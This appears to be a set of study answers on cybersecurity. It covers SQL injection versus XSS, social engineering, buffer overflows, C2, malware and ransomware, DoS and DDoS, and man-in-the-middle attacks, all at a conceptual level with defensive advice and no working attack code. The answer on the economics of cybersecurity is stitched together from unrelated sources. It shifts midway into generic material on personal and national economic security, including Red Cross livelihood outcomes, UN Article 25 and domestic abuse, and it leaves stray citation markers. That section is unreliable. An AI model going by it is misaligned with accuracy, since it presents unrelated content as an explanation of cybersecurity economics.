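    # Safer: escape the untrusted text so the browser renders it as plain characters.
    safe_page = f"<p>{html.escape(comment)}</p>"
    print(safe_page)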

Differences between SQL injection and XSS attacks

Even though both SQL injection and XSS attacks are common web hacking techniques, there are a few key differences between the two.

Attack definition
  SQL injection attack: An attack technique where attackers target data-driven applications and compromise user/organization databases by performing certain actions.
  Cross-site scripting attack: An attack technique where attackers execute malicious code in the victim users' browsers, which they can control.

Entry point
  SQL injection attack: Initial access is achieved by exploiting a public-facing application.
  Cross-site scripting attack: Initial access is achieved through the drive-by compromise technique.

Attack technique
  SQL injection attack: The attacker injects malicious SQL queries into web form input fields.
  Cross-site scripting attack: The attacker injects malicious client-side scripts into webpages/websites.

Impact
  SQL injection attack: Upon successful execution, the attacker can add, delete, or modify the existing database and bypass the security controls.
  Cross-site scripting attack: Upon successful execution, the attacker can perform session hijacking, credential theft, data exfiltration, impersonation of the victim user, account hijacking, etc.

Attack language
  SQL injection attack: The most common language used in the attack is SQL.
  Cross-site scripting attack: The most common language used in the attack is JavaScript.

8. Describe social engineering attacks


Social engineering attacks are a type of cyber attack that manipulates human psychology to deceive
individuals into performing certain actions or divulging sensitive information. These attacks exploit the
natural tendency of people to trust and help others, making them vulnerable to manipulation.

Common social engineering attacks include:

1. Phishing: Attackers send fraudulent emails or messages that appear to be from a legitimate source,
such as a bank or service provider. These messages often prompt recipients to click on malicious links,
provide login credentials, or disclose personal information.

2. Pretexting: Attackers create a false scenario or pretext to trick individuals into revealing sensitive
information. They may impersonate someone in a position of authority, such as an IT technician or a
company executive, and use this false identity to gain trust and access sensitive data.

3. Baiting: Attackers entice individuals with an appealing offer, such as a free download or a prize, to lure
them into taking an action that compromises their security. For example, they may leave infected USB
drives in public places, hoping that someone will plug them into their computer and unknowingly install
malware.

4. Tailgating: In this attack, the attacker gains unauthorized physical access to a restricted area by
following closely behind an authorized person. The attacker exploits the natural tendency to hold doors
open for others or avoid confrontation.

5. Impersonation: Attackers pretend to be someone else, such as a coworker, a customer, or a service provider, to gain trust and convince individuals to share sensitive information or perform certain actions.

To protect against social engineering attacks, individuals should be cautious when sharing personal
information online or over the phone. They should verify the legitimacy of requests before providing any
sensitive data and be wary of unsolicited emails or messages. Organizations can educate their
employees about social engineering techniques and implement security protocols, such as two-factor
authentication and strict access controls, to mitigate the risk of these attacks.
9. Explain in detail endpoint-based attacks, such as buffer overflows, command and control (C2), malware, and ransomware.

Endpoint-based attacks refer to cyber attacks that target individual devices or endpoints, such as
computers, laptops, smartphones, or IoT devices. These attacks exploit vulnerabilities in the software or
hardware of these devices to gain unauthorized access, steal information, or disrupt operations. Some
common types of endpoint-based attacks include buffer overflows, command and control (C2) attacks,
malware, and ransomware.

What is a Buffer Overflow Attack?


Attackers exploit buffer overflow issues by overwriting the memory of an
application. This changes the execution path of the program, triggering a
response that damages files or exposes private information. For example, an
attacker may introduce extra code, sending new instructions to the application
to gain access to IT systems.

If attackers know the memory layout of a program, they can intentionally feed
input that the buffer cannot store, and overwrite areas that hold executable
code, replacing it with their own code. For example, an attacker can overwrite a
pointer (an object that points to another area in memory) and point it to an
exploit payload, to gain control over the program.

Types of Buffer Overflow Attacks


Stack-based buffer overflows are more common, and leverage stack
memory that only exists during the execution time of a function.

Heap-based attacks are harder to carry out and involve flooding the memory
space allocated for a program beyond memory used for current runtime
operations.

Command and Control (C2) Attacks

Command and Control (C2) Attacks: In a C2 attack, an attacker establishes a connection between a
compromised endpoint and a remote command and control server. This allows the attacker to remotely
control the compromised endpoint and execute various malicious activities, such as stealing sensitive
data, launching further attacks, or using the compromised endpoint as a launching pad for attacks on
other systems

Malware: Malware is a broad term that encompasses various types of malicious software designed to
harm or gain unauthorized access to endpoints. This includes viruses, worms, Trojans, spyware, and
adware. Malware can be delivered through various means, including email attachments, malicious
websites, or infected software downloads. Once installed on an endpoint, malware can perform a range
of malicious activities, such as stealing sensitive information, controlling the device remotely, or
disrupting normal operations.

Ransomware: Ransomware is a type of malware that encrypts files on an endpoint or an entire network, rendering them inaccessible to the user. The attacker then demands a ransom payment in
exchange for providing the decryption key. Ransomware attacks often exploit vulnerabilities in software
or use social engineering techniques to trick users into downloading or executing the malicious payload.
Ransomware attacks can have severe consequences, causing data loss, financial losses, and operational
disruptions.

To protect against endpoint-based attacks, individuals and organizations should implement several
security measures:

1. Keep software and operating systems up to date with the latest patches and security updates to
address known vulnerabilities.

2. Use robust antivirus and anti-malware software to detect and block malicious programs.

3. Employ intrusion detection and prevention systems (IDS/IPS) to monitor and block suspicious network
traffic.

10. Describe network attacks, such as protocol-based, denial of service, distributed denial of service,
and man-in-the-middle

What Is a Network Attack?


A network attack is an attempt to gain unauthorized access to an organization’s network, with the objective of stealing data or performing other malicious activity. There are two main types of
network attacks:

 Passive: Attackers gain access to a network and can monitor or steal sensitive information,
but without making any change to the data, leaving it intact.

 Active: Attackers not only gain unauthorized access but also modify data, either deleting,
encrypting or otherwise harming it.

What are the Common Types of Network Attacks?


1. Protocol-based Attacks: Protocol-based attacks exploit weaknesses or flaws in network protocols
to gain unauthorized access or disrupt network communication. For example, attackers may
exploit vulnerabilities in the Domain Name System (DNS) protocol to redirect users to malicious
websites or intercept their communications.

2. Denial-of-Service (DoS) attack: A DoS attack is an attack meant to shut down a machine or network, making it inaccessible to its intended users. DoS attacks accomplish this by flooding the target with traffic, or sending it information that triggers a crash. In both instances, the DoS attack deprives legitimate users (i.e. employees, members, or account holders) of the service or resource they expected.

DoS attacks often target web servers of high-profile organizations such as banking, commerce, and media companies, or government and trade organizations. Though DoS attacks do not typically result in the theft or loss of significant information or other assets, they can cost the victim a great deal of time and money to handle.

There are two general methods of DoS attacks: flooding services or crashing services. Flood attacks occur when the system receives too much traffic for the server to buffer, causing it to slow down and eventually stop.

3. Distributed Denial of Service (DDoS) attacks

Attackers build botnets, large fleets of compromised devices, and use them to direct false traffic at your network or servers. DDoS can occur at the network level, for example by sending huge volumes of SYN/ACK packets which can overwhelm a server, or at the application level, for example by performing complex SQL queries that bring a database to its knees.
4. Man-in-the-middle attacks

A man-in-the-middle attack involves attackers intercepting traffic, either between your network and external sites or within your network. If communication protocols are not secured or attackers find a way to circumvent that security, they can steal data that is being transmitted, obtain user credentials and hijack their sessions.

To protect against network attacks, individuals and organizations should implement several security
measures:

1. Use encryption protocols, such as Transport Layer Security (TLS) or Virtual Private Networks (VPNs), to
secure data transmitted over networks and prevent eavesdropping or tampering.

2. Implement firewalls and intrusion detection systems (IDS) to monitor and block suspicious network
traffic.

3. Regularly update network devices, such as routers and switches, with the latest firmware and security
patches to address known vulnerabilities.

4. Use strong and unique passwords for network devices and regularly change them to prevent
unauthorized access.

11. Describe the economics of cybersecurity

Cybersecurity economics can be defined as a field of research that utilizes a socio-technical perspective
to investigate economic aspects of cybersecurity such as budgeting, information asymmetry,
governance, and types of goods and services, to provide sustainable policy recommendations,
regulatory options, and practical solutions that can substantially improve the cybersecurity posture of
the interacting agents in the open socio-technical systems.

Cybersecurity Economics

A fundamental issue that must be addressed is what makes cybersecurity economics a single subject of
investigation. Indeed, cybersecurity and economics each constitute distinct types of investigation, as
reflected in the fact that they have long been studied as two separate disciplines by two large
independent groups of researchers, respectively, information and computer scientists and economists.
Therefore, there might be barriers to understanding how together they constitute a single field of study.
It can be argued that cybersecurity economics should be understood as an interdisciplinary field of study
that falls between and combines cybersecurity and economics. However, this perspective faces the
problem that there is more than one conception of how different disciplines are related.
Cat [1] presented a taxonomy of possible conceptions: interdisciplinary, multidisciplinary, cross-
disciplinary, and transdisciplinary. The strategy adopted by the scholars in this field is closest to
the transdisciplinarity (i.e., a synthetic creation that encompasses work from different disciplines), which
treats cybersecurity and economics as two different relatively independent systems of thinking that
interact in a complex socio-technical system. A complex socio-technical system paradigm takes the
interaction of different systems as the starting point and explains their relative interdependence
regarding how they interact in social and technical settings. This paradigm enables us to capture the
transformative effects that cybersecurity and economics might each have on one another[2]. To develop
a more clear understanding of these effects, this section continues to elaborate on how cybersecurity
started to draw from economics.

Insights in the field of cybersecurity economics empower decision-makers to make informed decisions
that improve their evaluation and management of situations that may lead to catastrophic
consequences and threaten the sustainability of digital ecosystems. By drawing on these insights,
cybersecurity practitioners have been able to respond to many complex problems that have emerged
within the context of cybersecurity over the last two decades. The academic field of cybersecurity
economics is highly interdisciplinary since it combines core findings and tools from disciplines such
as sociology, psychology, law, political science, and computer science.

Broadly construed, economic security is the ability of people to meet their needs
consistently. It is connected to both the concept of economic well-being and the notion of
the modern welfare state, a governmental entity that commits itself to providing baseline
guarantees for its citizens’ security.

Attempts to ensure economic security are meant to serve as a check against instability in
the market, which scholars say has become more important in the years since the fall of
the Soviet Union and the predominance of market capitalism. It may be even more relevant
in light of declining labor bargaining power since the 1970s in post-industrial economies,
such as the United States, and economic insecurity caused by COVID-19.

KEY TAKEAWAYS

 Economic security refers to the ability of people to meet their needs consistently.
 The concept is important for individuals and nations, where it is a factor in
assessing national security, and it’s connected to the concept of economic well-
being.
 Cultural standards are involved in determining economic security.
 Climate change, growing fears and anxieties around the globe, COVID-19, and big
technological changes have increased economic insecurity significantly in recent
years.

Understanding Economic Security


“Economic security” can be understood as a term for how well people are able to regularly
meet their needs. “Economic insecurity,” its opposite, happens when there aren’t enough
resources to pay for food, housing, medical care, and other essentials.

Cultural standards play a role in determining what’s included in the list of essentials for
economic security, meaning that both what counts as economic security and how it is
worked out have changed over time. The International Committee of the Red Cross, an
organization that tries to improve economic security globally, has identified five key
livelihood outcomes to track economic security:

 Food consumption
 Food production
 Living conditions
 Income
 The capacity of civil society organizations and the government to meet people’s
needs

Indeed, economic security relies on the perception of security in addition to quantifiable material or financial conditions. Economic security can be captured in numerous ways
depending on the level of analysis under consideration, ranging from the effects of foreign
investments on national economics to the ability of laborers to access health insurance.
Notably, researchers for the United Nations have said that the measurements for economic
security do not adequately capture volatility.

In Article 25, the United Nations’ Universal Declaration of Human Rights delineates the
right to a reasonable standard of living and to “security in the event of unemployment,
sickness, disability, widowhood, old age or other lack of livelihood in circumstances beyond
[their] control.”

Why is economic security important?
Without basic economic security, people cannot plan for their future or the future of their
children. The lack of security will harm people’s quality of life and lessen innovation and
trust in institutions. Financial anxieties and feelings of economic insecurity have many
other negative outcomes, such as prolonging how long victims of domestic abuse will stay
with an abuser.
